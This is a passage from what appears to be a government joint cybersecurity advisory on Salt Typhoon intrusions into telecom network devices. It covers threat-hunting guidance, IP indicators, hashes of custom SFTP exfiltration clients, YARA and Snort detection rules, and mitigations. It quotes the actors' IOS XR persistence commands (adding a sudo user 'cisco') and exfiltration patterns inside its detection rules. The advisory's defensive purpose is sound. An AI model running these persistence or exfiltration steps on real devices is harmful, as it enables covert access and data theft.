<p>On IOS XR, <code>sshd_operns</code> is disabled by default and must be explicitly started (e.g., service sshd_operns start). Persistence across reboots requires enabling at <code>init</code> (<code>chkconfig</code>) or equivalent.</p>
<p>In observed intrusions, the APT actors enabled <code>sshd_operns</code>, created a local user, and granted it sudo privileges (e.g., by editing <code>/etc/sudoers</code> or adding a file under <code>/etc/sudoers.d/</code>) to obtain root on the host OS after logging in via TCP/57722.&nbsp;</p>
<p>The commands listed in <strong>Table 2</strong> were executed from the host Linux bash shell as root.</p>
<table class="tablesaw tablesaw-stack">
<caption><strong>Table 2</strong>: Commands to add user to sudoers</caption>
<thead>
<tr>
<th role="columnheader">Command&nbsp;&nbsp;&nbsp;&nbsp;</th>
<th role="columnheader">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>service sshd_operns start</td>
<td>Starting the sshd_operns service</td>
</tr>
<tr>
<td>
<p>useradd cisco</p>
<p>password cisco</p>
</td>
<td>Adding a new user</td>
</tr>
<tr>
<td>sudo vi /etc/sudoers</td>
<td>Adding the new user to sudoers</td>
</tr>
<tr>
<td>chmod 4755 /usr/bin/sudo</td>
<td>As 4755 is the default permissions for sudo, it is unclear why the actors executed this command</td>
</tr>
</tbody>
</table>
<h2><strong>Threat hunting guidance</strong></h2>
<p>The authoring agencies encourage network defenders of critical infrastructure organizations, especially telecommunications organizations, to perform threat hunting, and, when appropriate, incident response activities. If malicious activity is suspected or confirmed, organizations should consider all mandatory reporting requirements to relevant agencies and regulators under applicable laws and regulations, and any additional voluntary reporting to appropriate agencies, such as cybersecurity or law enforcement agencies who can provide incident response guidance and assistance with mitigation. See the <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-239a#Contactinfo" title="Contact Information">Contact information</a> section for additional reporting information.</p>
<p>The malicious activity described in this advisory often involves persistent, long-term access to networks where the APT actors maintain several methods of access. Network defenders should exercise caution when sequencing defensive measures to maximize the chance of achieving full eviction, while remaining compliant with applicable laws, regulations, and guidance on incident response and data breach notifications in their jurisdictions. Where possible, gaining a full understanding of the APT actors’ extent of access into networks followed by simultaneous measures to remove them may be necessary to achieve a complete and lasting eviction. Partial response actions may alert the actors to an ongoing investigation and jeopardize the ability to conduct full eviction. Incident response on one network may also result in the APT actors taking measures to conceal and maintain their access on additional compromised networks, and potentially disrupt broader investigative and operational frameworks already in progress.</p>
<p>The APT actors often take steps to protect their established access, such as compromising mail servers or administrator devices/accounts to monitor for signs that their activity has been detected. Organizations should take steps to protect the details of their threat hunting and incident response from APT actor monitoring activities.</p>
<p>The authoring agencies strongly encourage organizations to conduct the following actions for threat hunting:</p>
<h3>Monitor configurations changes</h3>
<ul>
<li>Pull all configurations for running networking equipment and check for differences with latest authorized versions.
<ul>
<li>Review remote access configurations for proper application of ACL and transport protocols. Review ACLs for any unauthorized modifications.</li>
<li>If SNMP is being used, ensure networking equipment is configured to use SNMPv3 with the appropriate authentication and privacy configurations set, as defined in the User-based Security Model (USM) and the View-based Access Control Model (VACM).</li>
<li>Verify the authenticity of any configured local accounts and their permission levels.</li>
</ul>
</li>
<li>Check all routing tables to ensure that all routes are authorized and expected.</li>
<li>Verify that any PCAP commands configured on networking equipment are authorized.</li>
</ul>
<h3>Monitor virtualized containers</h3>
<ul>
<li>If networking equipment has the capability to run virtualized containers, ensure that all running virtualized containers are expected and authorized.</li>
<li>For devices that support Cisco Guest Shell (IOS XE and NX-OS), do not rely on device syslog alone to detect actor activity. Use a combination of device syslog, AAA command accounting, container (Guest Shell) logs, and off-box flow/telemetry.</li>
<li>Capture lifecycle and CLI activity with AAA accounting (TACACS+/RADIUS) for configuration/exec commands so that enable/disable and entry actions are recorded.</li>
<li>For IOS XE, hunt for <code>guestshell enable</code>, <code>guestshell run bash</code>, and <code>guestshell disable</code>. On NX-OS, hunt for <code>guestshell enable</code>, <code>run guestshel</code>l, and <code>guestshell destroy</code>. Alert on unexpected use of <code>chvrf</code> (running commands under a different VRF) and, on NX-OS, use of <code>dohost</code> (container invoking host CLI).</li>
</ul>
<h3>Monitor network services and tunnels</h3>
<ul>
<li>Monitor for management services running on non-standard ports (SSH, FTP, etc.).</li>
<li>Hunt for actor-favored protocol patterns:
<ul>
<li>SSH on high non-default ports with 22&#215;22/xxx22 numbering patterns from non-admin source IPs.</li>
<li>HTTPS/Web UI listeners on non-default high ports (18xxx) reachable from outside the management VRF.</li>
<li>TCP/57722 (IOS XR <code>sshd_operns</code>) reachability or flows.
<ul>
<li>Hunt for TCP/57722 listeners on IOS XR platforms (the host Linux <code>sshd_operns</code> service). Collect flow/telemetry (NetFlow/IPFIX) from the management VRF. Any inbound TCP/57722 should be treated as high-risk if unexpected.</li>
</ul>
</li>
<li>TACACS+ (TCP/49) flows to non-approved IPs or any TACACS+ traffic leaving the management VRF. Correlate with device configuration to detect redirection of TACACS+ servers to APT actor-controlled infrastructure.</li>
<li>FTP/TFTP flows originating from network devices to unapproved destinations, especially when preceded by on-box PCAP collection activity.</li>
</ul>
</li>
<li>Audit any tunnel that transits a security boundary, such as peering points between providers, to ensure it can be accounted for by network administrators. In particular, examine:
<ul>
<li>Unexplained or unexpected tunnels between Autonomous System Numbers (ASNs).</li>
<li>Unauthorized use of file transfer protocols, such as FTP and TFTP.
<ul>
<li>Monitor network traffic for abnormal volumes of files transfers to internal FTP servers, which the APT actors may use as staging areas prior to data exfiltration.</li>
</ul>
</li>
<li>Extensive SSH activity against routers, followed by the establishment of both an incoming tunnel and outgoing tunnel—each of which may leverage different protocols.</li>
</ul>
</li>
</ul>
<h3>Monitor firmware and software integrity</h3>
<ul>
<li>Perform hash verification on firmware and compare values against the vendor&#8217;s database to detect unauthorized modification to the firmware. Ensure that the firmware version is as expected.</li>
<li>Compare hashes of images both on disk and in memory against known-good values. Reference the <a href="https://media.defense.gov/2023/Oct/06/2003315573/-1/-1/0/NETWORK%20DEVICE%20INTEGRITY%20NDI%20METHODOLOGY.PDF" target="_blank" title="Network Device Integrity (NDI) Methodology">Network Device Integrity (NDI) Methodology</a> or <a href="https://media.defense.gov/2023/Oct/06/2003315572/-1/-1/0/NETWORK%20DEVICE%20INTEGRITY%20ON%20CISCO%20IOS%20DEVICES.PDF" target="_blank" title="Network Device Integrity (NDI) on Cisco IOS Devices">Network Device Integrity (NDI) on Cisco IOS Devices</a> for more information.</li>
<li>Use the product’s run-time memory validation or integrity verification tool to identify any changes to the run-time firmware image.</li>
<li>Where supported by the platform, enable image and configuration integrity features, such as signed image enforcement and secure configuration checkpoints. Alert on any boot-time or run-time verification failure.</li>
<li>Check any available file directories that may exist (flash, non-volatile random-access memory [NVRAM], system, etc.) for non-standard files.</li>
</ul>
<h3>Monitor logs</h3>
<ul>
<li>Review logs forwarded from network devices for indications of potential malicious behavior, such as:
<ul>
<li>Evidence of clearing locally stored logs,</li>
<li>Disabling log creation or log forwarding,</li>
<li>Starting a PCAP recording process using available functions,</li>
<li>Allowing remote access via non-standard methods or to new locations, and</li>
<li>Changes to configuration of devices via non-standard methods or from unexpected locations.</li>
</ul>
</li>
<li>Alert on creation/start of any on-box packet capture (e.g., <code>monitor capture ... start</code>, Embedded Packet Capture) or SPAN/RSPAN/ERSPAN session definitions, especially those matching TACACS+ (TCP/49) or RADIUS.</li>
<li>Inventory and continuously watch <code>monitor session ...</code> (SPAN/ERSPAN) and PCAP state. Naming patterns include <code>mycap</code> and output filenames like <code>mycap.pcap</code>, <code>tac.pcap</code>, and <code>1.pcap</code>.</li>
<li>Where supported, deploy embedded event triggers (e.g., EEM on IOS XE/NX-OS) to syslog any invocation of packet-capture or <code>span/erspan</code> configuration commands, capturing the invoking username and source.</li>
<li>Audit for non-root local accounts granted sudo on XR host Linux (e.g., via <code>/etc/sudoers</code> or <code>/etc/sudoers.d/</code>). Where supported, ensure the host operating system (OS) <code>sshd_operns</code> service is disabled and not listening. Validate at each reboot and device upgrade.</li>
<li>Alert on config or telemetry indicating new XR host OS services, changes to systemd service states, or unexpected privilege escalations on the host OS.</li>
<li>Analyze internal FTP Server logs for any logins from unexpected sources.</li>
<li>Monitor network traffic for logons from one router to another router, as this should not be typical of normal router administration processes.</li>
</ul>
<p>If unauthorized activities are discovered, coordinate containment sequencing before disabling to avoid tipping active APT operators. Capture live artifacts (process lists, bound sockets, on-box files), then eradicate.</p>
<p>See the <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-239a#Contactinfo" title="Contact Information">Contact information</a> section of this advisory for response actions that should be taken if malicious activity is confirmed.</p>
<h2><strong>Indicators of compromise</strong></h2>
<h3><strong>IP-based indicators</strong></h3>
<p>The following IP indicators were associated with the APT actors’ activity from August 2021 to June 2025. <strong>Disclaimer</strong>: Several of these observed IP addresses were first observed as early as August 2021 and may no longer be in use by the APT actors. The authoring agencies recommend organizations investigate or vet these IP addresses prior to taking action, such as blocking.</p>
<table>
<caption><strong>Table 3</strong>: APT-associated IP-based Indicators, August 2021-June 2025</caption>
<tbody>
<tr>
<td>1.222.84[.]29&nbsp;</td>
<td>167.88.173[.]252</td>
<td>37.120.239[.]52</td>
<td>45.61.159[.]25</td>
</tr>
<tr>
<td>103.168.91[.]231</td>
<td>167.88.173[.]58</td>
<td>38.71.99[.]145</td>
<td>45.61.165[.]157</td>
</tr>
<tr>
<td>103.199.17[.]238</td>
<td>167.88.175[.]175</td>
<td>43.254.132[.]118</td>
<td>5.181.132[.]95</td>
</tr>
<tr>
<td>103.253.40[.]199</td>
<td>167.88.175[.]231</td>
<td>45.125.64[.]195</td>
<td>59.148.233[.]250</td>
</tr>
<tr>
<td>103.7.58[.]162</td>
<td>172.86.101[.]123</td>
<td>45.125.67[.]144</td>
<td>61.19.148[.]66</td>
</tr>
<tr>
<td>104.194.129[.]137</td>
<td>172.86.102[.]83</td>
<td>45.125.67[.]226</td>
<td>63.141.234[.]109</td>
</tr>
<tr>
<td>104.194.147[.]15</td>
<td>172.86.106[.]15</td>
<td>45.146.120[.]210</td>
<td>63.245.1[.]13</td>
</tr>
<tr>
<td>104.194.150[.]26</td>
<td>172.86.106[.]234</td>
<td>45.146.120[.]213</td>
<td>63.245.1[.]34&nbsp;</td>
</tr>
<tr>
<td>104.194.153[.]181</td>
<td>172.86.106[.]39</td>
<td>45.59.118[.]136</td>
<td>74.48.78[.]66 &nbsp;</td>
</tr>
<tr>
<td>104.194.154[.]150</td>
<td>172.86.108[.]11</td>
<td>45.59.120[.]171</td>
<td>74.48.78[.]116 &nbsp;</td>
</tr>
<tr>
<td>104.194.154[.]222</td>
<td>172.86.124[.]235</td>
<td>45.61.128[.]29</td>
<td>74.48.84[.]119 &nbsp;</td>
</tr>
<tr>
<td>107.189.15[.]206</td>
<td>172.86.65[.]145</td>
<td>45.61.132[.]125</td>
<td>85.195.89[.]94</td>
</tr>
<tr>
<td>14.143.247[.]202</td>
<td>172.86.70[.]73</td>
<td>45.61.133[.]157</td>
<td>89.117.1[.]147</td>
</tr>
<tr>
<td>142.171.227[.]16</td>
<td>172.86.80[.]15</td>
<td>45.61.133[.]31</td>
<td>89.117.2[.]39</td>
</tr>
<tr>
<td>144.172.76[.]213</td>
<td>190.131.194[.]90</td>
<td>45.61.133[.]61</td>
<td>89.41.26[.]142</td>
</tr>
<tr>
<td>144.172.79[.]4</td>
<td>193.239.86[.]132</td>
<td>45.61.133[.]77</td>
<td>91.231.186[.]227</td>
</tr>
<tr>
<td>146.70.24[.]144</td>
<td>193.239.86[.]146</td>
<td>45.61.133[.]79</td>
<td>91.245.253[.]99</td>
</tr>
<tr>
<td>146.70.79[.]68</td>
<td>193.43.104[.]185</td>
<td>45.61.134[.]134</td>
<td>2001:41d0:700:65dc::f656[:]929f</td>
</tr>
<tr>
<td>146.70.79[.]81</td>
<td>193.56.255[.]210</td>
<td>45.61.134[.]223</td>
<td rowspan="5">2a10:1fc0:7::f19c[:]39b3</td>
</tr>
<tr>
<td>164.82.20[.]53</td>
<td>212.236.17[.]237</td>
<td>45.61.149[.]200</td>
</tr>
<tr>
<td>167.88.164[.]166</td>
<td>23.227.196[.]22</td>
<td>45.61.149[.]62</td>
</tr>
<tr>
<td>167.88.172[.]70</td>
<td>23.227.199[.]77</td>
<td>45.61.151[.]12</td>
</tr>
<tr>
<td>167.88.173[.]158</td>
<td>23.227.202[.]253</td>
<td>45.61.154[.]130</td>
</tr>
</tbody>
</table>
<h3>&nbsp;Custom SFTP client</h3>
<p>The APT actors also use a custom SFTP client, which is a Linux binary written in Golang, to transfer encrypted archives from one location to another.&nbsp;</p>
<p>The following SFTP client binaries in <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-239a#Table4" title="Table4"><strong>Table 4</strong></a> through <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-239a#Table7" title="Table 7"><strong>Table 7</strong></a><strong> </strong>are similar in that they are used to transfer files from a compromised network to staging hosts where the files are prepared for exfiltration. However, <code>cmd1</code> has the additional capability of collecting network packet captures on the compromised network. Note: The <code>cmd3</code> and <code>cmd1</code> clients were likely written by the same developer since they have similar build path strings and code structure.</p>
<table>
<caption><a class="ck-anchor" id="Table4"><strong>Table 4</strong></a>: cmd3 SFTP client&nbsp;</caption>
<tbody>
<tr>
<th>File Name&nbsp;</th>
<td>cmd3&nbsp;</td>
</tr>
<tr>
<th>MD5 Hash&nbsp;</th>
<td>eba9ae70d1b22de67b0eba160a6762d8&nbsp;</td>
</tr>
<tr>
<th>SHA 256 Hash</th>
<td>8b448f47e36909f3a921b4ff803cf3a61985d8a10f0fe594b405b92ed0fc21f1</td>
</tr>
<tr>
<th>File Size (bytes)&nbsp;</th>
<td>3506176&nbsp;</td>
</tr>
<tr>
<th>File Type&nbsp;</th>
<td>ELF 64-bit LSB executable x86-64 version 1 (SYSV) statically linked Go BuildID=rHFK_GWSIG3fShYR02ys/Hou3WF-dO9MYtI232CYr/<br />D3n2Irn5doNndtloYkEi/r3IcebaH3y02cYer7tm0 stripped&nbsp;</td>
</tr>
<tr>
<th>Command Line Usage&nbsp;</th>
<td>./cmd3 &lt;encrypted_configuration_string&gt;&nbsp;</td>
</tr>
<tr>
<th>Version String&nbsp;</th>
<td>v1.0&nbsp;</td>
</tr>
<tr>
<th>Build Path String&nbsp;</th>
<td>C:/work/sync/cmd/cmd3/main.go&nbsp;</td>
</tr>
</tbody>
</table>
<table>
<caption><strong>Table 5</strong>: cmd1 SFTP client</caption>
<tbody>
<tr>
<th>File Name&nbsp;</th>
<td>cmd1&nbsp;</td>
</tr>
<tr>
<th>MD5 Hash&nbsp;</th>
<td>33e692f435d6cf3c637ba54836c63373&nbsp;</td>
</tr>
<tr>
<th>SHA 256 Hash</th>
<td>f2bbba1ea0f34b262f158ff31e00d39d89bbc471d04e8fca60a034cabe18e4f4</td>
</tr>
<tr>
<th>File Size (bytes)&nbsp;</th>
<td>3358720&nbsp;</td>
</tr>
<tr>
<th>File Type&nbsp;</th>
<td>ELF 64-bit LSB executable x86-64 version 1 (SYSV) statically linked Go BuildID=N3lepXdViXHdPCh5amSa/LhM5susdTarcmIQEMqku/<br />eplvxiWNUFNeKXjT-6sd/R-eCtbFZFNozRZqEuwZY stripped&nbsp;</td>
</tr>
<tr>
<th>Command Line Usage&nbsp;</th>
<td>./cmd1 &lt;encrypted_configuration_string&gt;&nbsp;</td>
</tr>
<tr>
<th>Version String&nbsp;</th>
<td>V20240816&nbsp;</td>
</tr>
<tr>
<th>Build Path String&nbsp;</th>
<td>C:/work/sync_v1/cmd/cmd1/main.go&nbsp;</td>
</tr>
</tbody>
</table>
<h4><strong>Cmd1 SFTP client Yara rule&nbsp;</strong></h4>
<div>
<div>
<p><code>rule SALT_TYPHOON_CMD1_SFTP_CLIENT {</code></p>
<p><code>&nbsp; &nbsp; meta:</code></p>
<p><code>&nbsp; &nbsp; description = "Detects the Salt Typhoon Cmd1 SFTP client. Rule is meant for threat hunting."</code></p>
<br />
<p><code>&nbsp; &nbsp; strings:</code></p>
<p><code>&nbsp; &nbsp; &nbsp; &nbsp; $s1 = "monitor capture CAP"</code></p>
<p><code>&nbsp; &nbsp; &nbsp; &nbsp; $s2 = "export ftp://%s:%s@%s%s"</code></p>
<p><code>&nbsp; &nbsp; &nbsp; &nbsp; $s3 = "main.CapExport"</code></p>
<p><code>&nbsp; &nbsp; &nbsp; &nbsp; $s4 = "main.SftpDownload"</code></p>
<p><code>&nbsp; &nbsp; &nbsp; &nbsp; $s5 = ".(*SSHClient).CommandShell"</code></p>
<p><code>&nbsp; &nbsp; &nbsp; &nbsp; $aes = "aes.decryptBlockGo"</code></p>
<p><code>&nbsp; &nbsp; &nbsp; &nbsp; $buildpath = "C:/work/sync_v1/cmd/cmd1/main.go"</code></p>
<br />
<p><code>&nbsp; &nbsp; condition:</code></p>
<p><code>&nbsp; &nbsp; &nbsp; &nbsp; (uint32(0) == 0x464c457f or (uint16(0) == 0x5A4D and&nbsp;</code><br /><code>&nbsp; &nbsp; &nbsp; &nbsp; uint32(uint32(0x3C)) == 0x00004550) or ((uint32(0) == 0xcafebabe)</code><br /><code>&nbsp; &nbsp; &nbsp; &nbsp; or (uint32(0) == 0xfeedface) or (uint32(0) == 0xfeedfacf)&nbsp;</code><br /><code>&nbsp; &nbsp; &nbsp; &nbsp; or (uint32(0) == 0xbebafeca) or (uint32(0) == 0xcefaedfe)&nbsp;</code><br /><code>&nbsp; &nbsp; &nbsp; &nbsp; or (uint32(0) == 0xcffaedfe)))&nbsp;</code><br /><code>&nbsp; &nbsp; &nbsp; &nbsp; and 5 of them</code></p>
<p><code>}</code></p>
<table>
<caption><strong>Table 6</strong>: new2 SFTP client</caption>
<tbody>
<tr>
<th>File Name&nbsp;</th>
<td>new2</td>
</tr>
<tr>
<th>SHA 256 Hash</th>
<td>da692ea0b7f24e31696f8b4fe8a130dbbe3c7c15cea6bde24cccc1fb0a73ae9e</td>
</tr>
<tr>
<th>File Type&nbsp;</th>
<td>ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=294d1f19a085a730da19a6c55788ec08c2187039, stripped</td>
</tr>
</tbody>
</table>
<h4><strong>New2 SFTP client Yara rule&nbsp;</strong></h4>
<div>
<p><code>rule SALT_TYPHOON_NEW2_SFTP_CLIENT {</code></p>
<p><code>&nbsp; &nbsp; meta:</code></p>
<p><code>&nbsp; &nbsp; &nbsp; &nbsp; description = "Detects the Salt Typhoon New2 SFTP client. Rule is meant for threat hunting."</code></p>
<br />
<p><code>&nbsp; &nbsp; strings:</code></p>
<p><code>&nbsp; &nbsp; &nbsp; &nbsp; $set_1_1 = "invoke_shell"</code></p>
<p><code>&nbsp; &nbsp; &nbsp; &nbsp; $set_1_2 = "execute_commands"</code></p>
<p><code>&nbsp; &nbsp; &nbsp; &nbsp; $set_1_3 = "cmd_file"</code></p>
<p><code>&nbsp; &nbsp; &nbsp; &nbsp; $set_1_4 = "stop_event"</code></p>
<p><code>&nbsp; &nbsp; &nbsp; &nbsp; $set_1_5 = "decrypt_message"</code></p>
<p><code>&nbsp; &nbsp; &nbsp; &nbsp; $set_2_1 = "COMMANDS_FILE"</code></p>
<p><code>&nbsp; &nbsp; &nbsp; &nbsp; $set_2_2 = "RUN_TIME"</code></p>
<p><code>&nbsp; &nbsp; &nbsp; &nbsp; $set_2_3 = "LOG_FILE"</code></p>
<p><code>&nbsp; &nbsp; &nbsp; &nbsp; $set_2_4 = "ENCRYPTION_PASSWORD"</code></p>
<p><code>&nbsp; &nbsp; &nbsp; &nbsp; $set_2_5 = "FIREWALL_ADDRESS"</code></p>
<p><code>&nbsp; &nbsp; &nbsp; &nbsp; $set_3_1 = "commands.log"</code></p>
<p><code>&nbsp; &nbsp; &nbsp; &nbsp; $set_3_2 = "Executing command: {}"</code></p>
<p><code>&nbsp; &nbsp; &nbsp; &nbsp; $set_3_3 = "Connecting to: {}"</code></p>
<p><code>&nbsp; &nbsp; &nbsp; &nbsp; $set_3_4 = "Network sniffer script."</code></p>
<p><code>&nbsp; &nbsp; &nbsp; &nbsp; $set_3_5 = "tar -czvf - {0} | openssl des3 -salt -k password -out {0}.tar.gz"</code></p>
<p><code>&nbsp; &nbsp; &nbsp; &nbsp; $set_required = { 00 70 61 72 61 6D 69 6B 6F }</code></p>
<br />
<p><code>&nbsp; &nbsp; condition:</code></p>
<p><code>&nbsp; &nbsp; &nbsp; &nbsp; $set_required and 4 of ($set_1_*) and 4 of ($set_2_*)&nbsp;</code><br /><code>&nbsp; &nbsp; &nbsp; &nbsp; and 4 of ($set_3_*)</code></p>
<p><code>}</code></p>
</div>
<table>
<caption><a class="ck-anchor" id="Table7"><strong>Table 7</strong></a>: sft SFTP client</caption>
<tbody>
<tr>
<th>File Name&nbsp;</th>
<td>sft</td>
</tr>
<tr>
<th>SHA 256 Hash</th>
<td>a1abc3d11c16ae83b9a7cf62ebe6d144dfc5e19b579a99bad062a9d31cf30bfe</td>
</tr>
<tr>
<th>File Type&nbsp;</th>
<td>ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, Go BuildID=Q_mmdNzBVit4XSJyGrtd/ampmN-03i9bT1qzD9njH/MFeCrtuGl37O7UNKFQyk/sBN-cduKnfSAvXO7jzGG, with debug_info, not stripped</td>
</tr>
</tbody>
</table>
<h4><strong>CVE 2023-20198 Snort rule</strong></h4>
<div>
<p><code>alert tcp any any -&gt; any $HTTP_PORTS (msg:"Potential CVE-2023-20198 exploit attempt - HTTP Request to Add Privilege 15 User Detected"; content:"POST"; http_method; pcre:"/(webui_wsma|%2577ebui_wsma|%2577eb%2575i_%2577sma)/i"; http_uri; content:"&lt;request xmlns="urn:cisco:wsma-config" correlator="execl"&gt;"; http_client_body; content:"&lt;configApply details="all"&gt;"; http_client_body; content:"&lt;config-data&gt;"; http_client_body; content:"&lt;cli-config-data-block&gt;"; http_client_body; content:"username"; http_client_body; content:"privilege 15"; http_client_body; content:"secret"; http_client_body; sid:1000003; rev:1;)</code></p>
</div>
<h2><strong>Mitigations</strong></h2>
<p>These APT actors are having considerable success using publicly known CVEs to gain access to networks, so organizations are strongly encouraged to prioritize patching in a way that is proportionate to this threat, such as by sequencing patches to address the highest risks first. See CISA’s <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" title="Known Exploited Vulnerabilities Catalog">Known Exploited Vulnerabilities Catalog</a> for further information. Specifically, organizations should ensure edge devices are not vulnerable to the known exploited CVEs identified in this advisory—CVE-2024-21887, CVE-2024-3400, CVE-2023-20273, CVE-2023-20198, and CVE-2018-0171. This list is not exhaustive.</p>
<p>Note: This advisory uses <a href="https://d3fend.mitre.org/" target="_blank" title="MITRE D3FEND">MITRE D3FEND™</a>, version 1.2.0, cybersecurity countermeasures. See the <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-239a#AppC" title="Appendix C"><strong>Appendix C: MITRE D3FEND Countermeasures</strong></a> section of this advisory for a table of the mitigations mapped to MITRE D3FEND countermeasures.</p>
<h3>General recommendations</h3>
<ul>
<li>Regularly review network device (especially router) logs and configurations for evidence of any unexpected, unapproved, or unusual activity, especially for the activities listed in this advisory [<a href="https://d3fend.mitre.org/technique/d3f:PlatformMonitoring/" target="_blank" title="D3-PM">D3-PM</a>]. In particular, check for:
<ul>
<li>Unexpected GRE or other tunneling protocols, especially with foreign infrastructure [<a href="https://d3fend.mitre.org/technique/d3f:NetworkTrafficCommunityDeviation/" target="_blank" title="D3-NTCD">D3-NTCD</a>].</li>
<li>Unexpected external IPs set as a TACACS+ or RADIUS server, or other AAA service configuration modifications.</li>
<li>Unexpected external IPs in ACLs.</li>
<li>Unexpected packet capture or network traffic mirroring settings.</li>
<li>Unexpected virtual containers running on network devices, or, where virtual containers are expected, unexpected commands within the containers.</li>
</ul>
</li>
<li>Employ a robust change management process that includes periodic auditing of device configurations [<a href="https://d3fend.mitre.org/technique/d3f:PlatformMonitoring/" target="_blank" title="D3-PM">D3-PM</a>].
<ul>
<li>Ensure all networking configurations are stored, tracked, and regularly audited via a change management process. A change management process audits approved configurations against what is currently running in an organization’s infrastructure.</li>
<li>Review firewall rule creation and modification dates, cross referencing against change management approvals, to detect unauthorized rules or rule changes.</li>
<li>Create alarms or alerts for unusual router administration access, commands, or other activity.</li>
</ul>
</li>
<li>Attempt to identify the full scope of a suspected compromise before mitigating. While it is important to contain the intrusion and prevent further malicious activity, if the full scope is not identified and mitigated fully, the actors may retain access and cause further malicious activity. Threat hunting and incident response efforts should be balanced against the total potential malicious activity with the goals of full eviction and minimizing damage.
<ul>
<li>An established compromise by these APT actors will likely include recurring, large-scale exfiltration from the compromised network. In at least one instance, the APT actors utilized GRE and MPLS tunnels to move data back to China.</li>
</ul>
</li>
<li>Disable outbound connections from management interfaces to limit possible lateral movement activity between network devices [<a href="https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering/" target="_blank" title="D3-OTF">D3-OTF</a>].</li>
<li>Disable all unused ports and protocols (both traffic and management protocols) [<a href="https://d3fend.mitre.org/technique/d3f:ApplicationConfigurationHardening/" target="_blank" title="D3-ACH">D3-ACH</a>]. Only use encrypted and authenticated management protocols (e.g., SSH, SFTP/SCP, HTTPS) and disable all others, especially unencrypted protocols (e.g., Telnet, FTP, HTTP).</li>
<li>Change all default administrative credentials, especially for network appliances and other network devices [<a href="https://d3fend.mitre.org/technique/d3f:ChangeDefaultPassword/" target="_blank" title="D3-CFP">D3-CFP</a>].</li>
<li>Require public-key authentication for administrative roles. Disable password authentication where operationally feasible. Minimize authentication attempts and lockout windows to slow brute force and sprayed attempts [<a href="https://d3fend.mitre.org/technique/d3f:CredentialHardening/" target="_blank" title="D3-CH">D3-CH</a>].</li>
<li>Use the vendor recommended version of the network device operating system and keep it updated with all patches. Upgrade unsupported network devices to ones that are supported by the vendor with security updates [<a href="https://d3fend.mitre.org/technique/d3f:SoftwareUpdate/" target="_blank" title="D3-SU">D3-SU</a>].</li>
</ul>
<h3>Hardening management protocols and services</h3>
<ul>
<li>Implement management-plane isolation and control-plane policing (CoPP) [<a href="https://d3fend.mitre.org/technique/d3f:NetworkIsolation/" target="_blank" title="D3-NI">D3-NI</a>].
<ul>
<li>Place all device management services (SSH, HTTPS, SNMP, TACACS+/RADIUS, SCP/SFTP) strictly in a dedicated out-of-band management network or a management VRF.</li>
<li>Ensure this management VRF has no route leakage to customers or peering VRFs and cannot initiate or receive sessions from data-plane or peering address space [<a href="https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering/" target="_blank" title="D3-ITF">D3-ITF</a>].</li>
<li>Block all egress from the management VRF except to explicitly authorized AAA/syslog/NetFlow/IPFIX/telemetry collectors to prevent actor use of management interfaces as lateral movement conduits or exfiltration paths.</li>
<li>Apply explicit management-plane ACLs at the control plane (e.g., CoPP/CPPr) to allowlist (i.e., default-deny) and rate-limit management protocols. Allow only approved management station IPs/subnets and jump servers.
<ul>
<li>Apply these restrictions to all SNMP, TACACS+/RADIUS (TCP/UDP 49/1812/1813), HTTPS (TCP/443 and any configured non-default port), SSH (TCP/22 and any configured non-default port), and SFTP/SCP.</li>
<li>For devices that do not support ACLs, place on a separate management Virtual Local Area Network (VLAN); an ACL can be applied to this management VLAN from an upstream device, such as a router or Layer 3 switch.</li>
</ul>
</li>
</ul>
</li>
<li>Use SSHv2 only and disable Telnet. Audit and restrict SSH on non-default ports (e.g., 22&#215;22 and xxx22 patterns) commonly used by the APT actors.</li>
<li>If a web interface is operationally required, bind it only to the management VRF/interface. Use HTTPS only and disable unencrypted HTTP. Require AAA for web interface access. Monitor and alert on non-default high HTTPS ports (e.g., 18xxx) observed in intrusions.</li>
<li>Use SNMPv3 only, and disable SNMPv1 and SNMPv2. Configure Trusted Managers and ACLs to limit SNMP access to only trusted devices.
<ul>
<li>Change all weak and default SNMP community strings.</li>
<li>Restrict and monitor SNMP writes.</li>
<li>Enforce SNMPv3 with authPriv and apply VACM views that exclude configuration-altering MIB objects from write access. Only grant read access for required OIDs; reserve write access for tightly scoped automation accounts from approved managers.</li>
</ul>
</li>
<li>Continuously monitor SNMP SET operations and alert on changes to AAA servers, HTTP/HTTPS enablement or port changes, tunnel interfaces, SPAN/ERSPAN sessions, and routing and ACL objects. Actor tradecraft includes issuing SNMP SETs to make covert configuration changes at scale.</li>
<li>Configure only strong cryptographic cipher suites for all management protocols (e.g., SSH, SFTP, HTTPS) and reject all weak ones.</li>
<li>Enforce per-protocol rate limits (particularly for SSH, HTTPS, SNMP, TACACS+/RADIUS) to blunt credential-guessing and slow “low-and-slow&#8221; abuse of built-in functions (e.g., Embedded Packet Capture, tunnel setup) without denying legitimate admin access.</li>
<li>Eliminate unintended IPv6 management exposure.
<ul>
<li>If IPv6 is enabled, apply equivalent controls for IPv6 as for IPv4.</li>
<li>Enforce management-plane ACLs and CoPP for IPv6. Bind management services only to the management VRF/interface in IPv6.</li>
<li>Audit for IPv6-reachable management services and tunnels, as the APT actors’ infrastructure includes IPv6 addresses.&nbsp;</li>
</ul>
</li>
</ul>
<h3>Implementing robust logging</h3>
<ul>
<li>Ensure logging is enabled and forwarded to a centralized server. Set the trap and buffer logging levels on each device to at least syslog level “informational” (code 6) to collect all necessary information.</li>
<li>Ensure all logs sent to a centralized logging server are transmitted via a secure, authenticated, and encrypted channel (such as IPsec, TLS, or SSH tunnels). The central server should maintain immutable logs with retention periods sufficient to support cybersecurity incident response investigations and comply with applicable retention policies.</li>
<li>Enable AAA command accounting for privileged commands to record any attempts to invoke those commands.</li>
</ul>
<h3>Routing best practices</h3>
<ul>
<li>Utilize routing authentication mechanisms, when possible.</li>
<li>Protect peering and edge routing paths often abused for covert redirection.
<ul>
